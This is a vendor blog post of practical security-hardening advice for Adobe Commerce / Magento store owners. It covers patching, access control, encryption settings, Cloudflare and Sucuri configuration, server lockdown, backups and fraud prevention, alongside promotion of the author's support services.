Protecting Your Adobe Commerce Store in 2024: A Complete Guide .

Protecting your Adobe Commerce / Magento store is essential in today’s digital landscape. This guide provides actionable steps to secure your site, from regular maintenance to advanced configurations with tools like Cloudflare and Sucuri. Stay ahead of threats in 2024 and build a secure, resilient eCommerce experience for your customers.

Dan Farmer

October 30, 2024
Adobe Commerce, Magento

In a world where threats are always changing, your Adobe Commerce / Magento store needs to be protected. Security isn’t just about checking a few boxes - it’s a multi-layered approach that covers all aspects of your site from backend access control to customer data protection. In this guide we’ll go through the detailed, actionable steps to help you harden your Adobe Commerce / Magento store in 2024, with practical advice on everything from regular updates to advanced Cloudflare and Sucuri configurations.

Oh, and if you need any help, our Adobe Commerce / Magento support services will help you keep your store up to date and complete all of the recommendations mentioned in this guide!

1. Regular Maintenance and Updates

Keeping up to date with Adobe Commerce / Magento updates and security patches is the foundation of keeping your store secure. Updates often include patches for recently discovered vulnerabilities, and newer versions of the platform may include additional security features and performance improvements.

Install All Security Patches ASAP

Adobe releases security patches regularly to address newly discovered vulnerabilities. Hackers exploit these known vulnerabilities so installing patches as soon as possible reduces the exposure. Adobe’s Security Center will notify you of new patches and you can set up automated patching tools to apply the patches quickly and consistently. Consider assigning someone on your team to monitor for these patches so they don’t get missed and you’re not exposed to vulnerabilities for too long.

Upgrade to the Latest Adobe Commerce Version

Beyond patches, upgrading to the latest Adobe Commerce / Magento version gives you access to new security features and functionality. Adobe includes new security mechanisms, performance improvements and bug fixes in new versions so upgrading regularly is a must. We recommend testing any new version in a staging environment first to ensure compatibility with custom extensions and themes. Also have a backup plan in place to roll back to a previous version if needed to avoid downtime during the upgrade.

Use the Magento Security Scan Tool

Adobe provides the free Magento Security Scan Tool which scans your store for over 30 known security risks, from malware and viruses to unsecured ports and outdated plugins. Schedule scans at least monthly and ideally after any major changes to your site. The Security Scan Tool will give you a detailed report with recommendations so you can fix issues before they can be exploited.

2. Access Control and Authentication

The backend of your Adobe Commerce / Magento store is the first target for attackers so managing who can access it is key. Implementing strict access control minimises the risk of unauthorised access and keeps your store secure.

Enable Two-Factor Authentication (2FA)

Two-factor authentication (2FA) adds an extra layer of security by requiring two forms of identification. For example after entering a password users must enter a code from their mobile device or authenticator app. This extra step can be the difference between being secure and not so secure as it will protect your store even if a password is compromised. Adobe Commerce / Magento has 2FA as a built in feature which you should enable for all admin users especially those with high level permissions.

Implement Role-Based Access Control (RBAC)

RBAC is a powerful security feature as it limits user permissions based on their role. For example your content team may only need access to product and content management areas while the finance team only needs access to payment and transaction details. Adobe Commerce / Magento allows you to create custom roles and permissions so users can only access what they need. RBAC not only improves security but also minimises the risk of accidental changes as only authorised users can change sensitive settings.

Use Strong, Unique Passwords

A common issue is weak or reused passwords which can be easily compromised. Enforce strong, unique password policies across your store, requiring a mix of uppercase letters, lowercase letters, numbers and special characters. Password updates regularly will reduce the risk of old passwords being used by attackers. You may also consider integrating a password manager to store and generate complex passwords securely.

Restrict Admin Access with IP Whitelisting

If possible limit backend access to a list of approved IP addresses. This feature is called IP whitelisting and will block any login attempt from an unauthorised IP address. IP whitelisting works well if your team works from specific, static locations like an office or a secure VPN. Implementing this feature will ensure only trusted networks can reach the backend and prevent attackers from accessing it from unapproved sources.

3. Data Encryption and Security Settings

Data encryption and proper security settings protect sensitive information whether it’s stored on your server or in transit. Encryption makes data unreadable so it’s harder for hackers to access.

Enforce SSL/TLS Site-Wide

SSL (Secure Sockets Layer) and TLS (Transport Layer Security) are the protocols to encrypt data between your store and your customers. SSL/TLS secures all site interactions, browsing, registration and checkout. Besides security SSL/TLS is required for PCI compliance and it improves your SEO as search engines rank HTTPS sites higher. Enforcing SSL/TLS across your site will keep customer data private and secure during interactions.

Enable Content Security Policy (CSP)

Content Security Policy (CSP) is an advanced feature that limits the resources your site can load. By allowing only trusted sources for content, scripts and styles CSP will prevent external scripts from running. This is especially effective against cross-site scripting (XSS) attacks where hackers inject malicious scripts into your site. Adobe Commerce / Magento makes it easy to set up CSP rules adding an extra layer of defence against code execution.

Use Secure Cookies

Cookies store important data like session information and login details. Setting cookies as HTTP-only and secure means they will only be transmitted over secure HTTPS and cannot be accessed through JavaScript. Secure cookies will reduce the risk of session hijacking where an attacker can gain unauthorised access by stealing session information.

4. Cloudflare Pro Plan + Configuration

Adding Cloudflare services to your Adobe Commerce / Magento store will give you extra security protection against bots, malicious traffic and other threats. Here’s how to configure Cloudflare for maximum protection.

Configure High Security Level

Cloudflare’s security settings allow you to select a security level based on your store’s needs. Setting the security level to “High” will aggressively filter visitors, blocking any potentially malicious traffic. This is especially useful for eCommerce sites as they’re often targets for bot attacks, spam and automated brute-force attempts.

Consider Country-Based Blocking or Managed Challenges

If your store doesn’t do business in certain high-risk regions (e.g. China, Hong Kong, Russia, Ukraine, North Korea, Turkey and Poland) consider blocking or applying managed challenges for visitors from those areas. Managed challenges will prompt users from those regions to complete CAPTCHA-like tasks, filtering out automated attacks without affecting legitimate users.

Enable Page Shield

Page Shield is a client-side security feature that protects against JavaScript-based attacks like form-jacking and Magecart attacks. These attacks target customer data by injecting malicious scripts into pages, often going undetected until data is compromised. With Page Shield enabled Cloudflare can detect suspicious JavaScript activity and alert you if any issues arise, which will help protect customer data.

Enable Managed Rules

Cloudflare’s Managed Ruleset will automatically protect your site from common web threats like SQL injections, XSS and other vulnerabilities listed in the OWASP Top 10. These rules are updated by Cloudflare regularly so you’ll be protected from new and emerging threats with minimal configuration. Managed rules are a must have for eCommerce sites especially those that handle large amounts of customer data.

IP Whitelist for Admin URLs

Restricting access to admin URLs by IP will only allow authorised IPs to access sensitive areas of your store like the backend. This is especially useful for minimising exposure to brute-force attacks as only approved IPs will be allowed to access.

5. Sucuri Scanning

Sucuri’s suite of tools for monitoring, detecting and protecting against threats is a must have for your Adobe Commerce / Magento security.

Set Up Regular Security Scans

Sucuri’s security tools will detect malware, vulnerabilities and other potential risks that can compromise your store. Schedule regular scans – ideally weekly or after major site updates – so you can identify and fix issues before they become security incidents. This will minimise the chance of threats to turn into security breaches.

Enable Server-Side Scanning

While standard scans will scan the visible part of your site, server-side scans will scan the deeper parts of your site. Server-side scanning is essential to detect issues that are not visible on the front end like backdoor scripts or unauthorised files. Configuring Sucuri for server-side scanning will give you full site monitoring so threats will be detected at every level.

Set Up Alerts for Security Incidents

Sucuri has real-time alerts that will notify you immediately if threats or security incidents are detected. Alerts will allow you to respond quickly and minimise damage before threats escalate. Alerts can be configured to notify you through email, SMS or integrated notification systems so you’ll be informed of security status changes as they happen.

Review and Patch Vulnerabilities ASAP

When Sucuri detects vulnerabilities you need to address them as soon as possible. Sucuri’s reports will provide detailed information on each issue including step by step remediation. Review these reports regularly and apply the recommended fixes to keep your store secure and prevent vulnerabilities from being exploited.

6. Secure Backend and Server Environment

The backend and server environment is the heart of your Adobe Commerce / Magento store. Securing these areas is a must.

Change Default Admin Path

Changing the default admin URL path is a simple way to add security. By renaming the admin URL to a custom path you’re making it harder for attackers to find the backend login page. This extra layer of obscurity will deter automated bots and brute-force attacks as they won’t be able to target the default admin path.

Set Correct File Permissions

Proper file permissions will restrict access to sensitive files and directories. Limit write permissions on config files and directories that contain critical data so only essential users have access. Follow the principle of least privilege where each user has only the permissions necessary for their role to reduce security risks.

Enable Logging and Monitoring

Log all backend access and config changes so you have a full record of activity and can detect suspicious behaviour early. Review logs regularly to identify attempted unauthorised access or unusual patterns. Many security solutions like Sucuri offer centralised logging and real-time alerts for suspicious activity so you can monitor and respond to potential threats.

Server Updates and Patching

Keeping your server’s OS and software up-to-date will prevent exploitation of known vulnerabilities. Update critical services like Apache, Nginx, MySQL and PHP as soon as patches are released. Server updates will provide security fixes for newly discovered vulnerabilities and attacks.

IP Restrict Core Services (SSH, MySQL, FTP etc.)

Limiting access to core server services by IP will ensure only trusted sources can connect. Restricting access to services like SSH, MySQL and FTP will reduce the risk of unauthorised access to your server. This is especially effective when combined with secure VPN access and will limit server access to a controlled group of users.

Restrict Port 80/443 Access to Cloudflare IP Ranges

Another powerful way to boost your Adobe Commerce / Magento store’s security is by limiting direct access to your server’s web traffic. By configuring your server firewall to only allow traffic on ports 80 (HTTP) and 443 (HTTPS) from Cloudflare’s IP address ranges, you ensure that all requests pass through Cloudflare’s security filters first, keeping potential threats from bypassing its protections.

Keep Your Hosting Environment Clean

Audit your hosting environment regularly to ensure that your environment is clean of any development tools or backup files. Leaving these on a production or even staging environments could lead to an attacker gaining access to your systems or even downloading full copies of your stores and customer data.

Audit Admin Users / CMS Content

More often than not, the first sign of a compromised Adobe Commerce / Magento store is the creation of new admin level users or modifications of CMS pages and blocks. Auditing admin users and CMS content regularly can help you identify any potential breach that may have occurred and subsequently block these bad actors from causing any further damage.

7. Fraud and Transaction Security

Securing the transaction process is crucial for customer data and a trusted shopping environment.

Utilise CAPTCHAs and Honeypots

CAPTCHA will prevent bots from accessing critical areas like login, registration and checkout pages. CAPTCHA will block automated scripts and reduce the risk of brute-force attacks and spam.

Another effective tool for detecting and deterring bots and malicious users is the honeypot. Honeypots are hidden fields or sections on your site that genuine visitors won’t see or interact with, only bots and automated scripts are likely to stumble upon them. Placing honeypots on key areas, such as login, registration, or checkout pages, can give you a quick and simple way to spot suspicious activity and prevent unwanted access.

Use PCI Compliant Payment Methods

PCI compliance is required for processing credit card transactions. Adobe Commerce / Magento has PCI compliant payment processing so your customer’s payment information is handled securely and you’ll have less liability for your store. PCI compliance will protect customer data and build trust as customers know their payment details are secure.

Fraud Detection Tools

Fraud detection tools will analyse transaction patterns to flag suspicious activity. Many fraud detection tools integrate with Adobe Commerce / Magento and can prevent costly chargebacks and protect your store’s bottom line. These tools will automatically flag suspicious behaviour like unusual order amounts or mismatched shipping and billing addresses so you can review orders before fulfilment.

8. Minimise Third Party Risks

Third-party extensions and services can add functionality to your store but may also introduce security risks.

Vet and Limit Extensions

Only install extensions from trusted, verified sources. Before installing an extension research reviews, update history and support options. Regularly audit extensions and remove any that are not in use or out of date as these can introduce vulnerabilities. Adobe Marketplace extensions are security reviewed but additional due diligence is required to minimise third party risks. Plus for every module you remove, you’ll see a bit of a performance boost too.

Limit Third Party Access

Restrict third party vendor permissions to the specific areas they need. Regularly review and adjust permissions to ensure third parties don’t have access to sensitive data or critical functions they don’t need, reducing the risk of unauthorised access.

9. Backup and Disaster Recovery

Having a backup and disaster recovery plan is essential to get back up and running in case of an emergency.

Set Up Daily Backups

Daily backups will ensure your data is safe and can be restored quickly in case of a breach or disaster. Store backups offsite or in a separate, secure location to protect from local data loss or ransomware attacks.

Test Your Recovery Process

Regularly test your backup restore process to ensure data can be restored quickly and accurately. Testing will verify your backup system is working as expected so you’ll be ready to restore data quickly in an emergency.

10. Additional Security Measures

Proactive security measures will keep your store resilient to emerging threats and always on your toes.

Conduct Regular Security Audits

Schedule audits regularly, in-house or with a security professional. Our security audit services will identify vulnerabilities, misconfigurations and other potential risks to give you a full view of your store’s security posture and compliance to best practices.

Train Staff on Security

Train employees to recognize phishing, social engineering and other security threats. Educating staff will reduce human error and make your store less vulnerable to attacks that target employees directly.

Stay Up to Date with Security

Keep up with security news, Adobe bulletins and industry trends to stay ahead of the curve. Staying up to date will allow you to adapt your security strategy to new risks and keep your store secure over time.

Thats It! Let's Review...

By following these steps and using tools such as Cloudflare and Sucuri, Adobe Commerce / Magento store owners can build a multi-layered security strategy that protects the business and its customers. Security is a continuous process and being proactive will keep your store secure, trusted and ready for growth in a constantly changing digital world.

No website is completely infallable, but by doing your best, using all best practices and modern tools, you will be much better off when facing off against those pesky attackers.

Would you like to chat about keeping your Adobe Commerce / Magento store secure? Please get in touch as we would love to hear from you!